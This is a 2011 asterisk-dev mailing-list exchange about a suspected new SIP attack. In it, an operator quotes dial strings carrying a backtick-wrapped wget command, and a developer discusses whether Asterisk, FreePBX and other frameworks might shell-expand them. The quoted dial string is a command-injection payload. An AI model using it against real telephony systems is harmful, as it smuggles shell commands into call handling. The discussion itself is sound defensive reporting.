[asterisk-dev] A new kind of SIP attack ?

Olle E. Johansson oej at edvina.net
Mon Sep 12 03:46:48 CDT 2011

12 sep 2011 kl. 10:39 skrev Pavel Troller:

> Hi!
>  Since yesterday, I can see strange "call attempts" coming to my
> switches over SIP to destinations like this:
>  00123456789000`wget\x20-O\x20/dev/null\x20http://`
>  I tried to wget the file manually and it was successful, but it was
> empty (zero size).
>  I'm just informing about something which may be a new kind of hacking
> attempt. I hope that Asterisk doesn't perform backtick expansion during
> processing of the called number, but I'm writing it there to be sure
> that a developer's eye will look at this and confirm it.

Personally I can't think of any part of Asterisk doing that. Now, if you're using system shell calls from the dialplan, your Asterisk might have an issue with it.

I am a bit more worried about Asterisk frameworks built with vaious calls to execute external scripts. We need to check with FreePBX, Elastix and the rest of them to get an answer.

The joys of alfanumeric call strings ;-)

More information about the asterisk-dev mailing list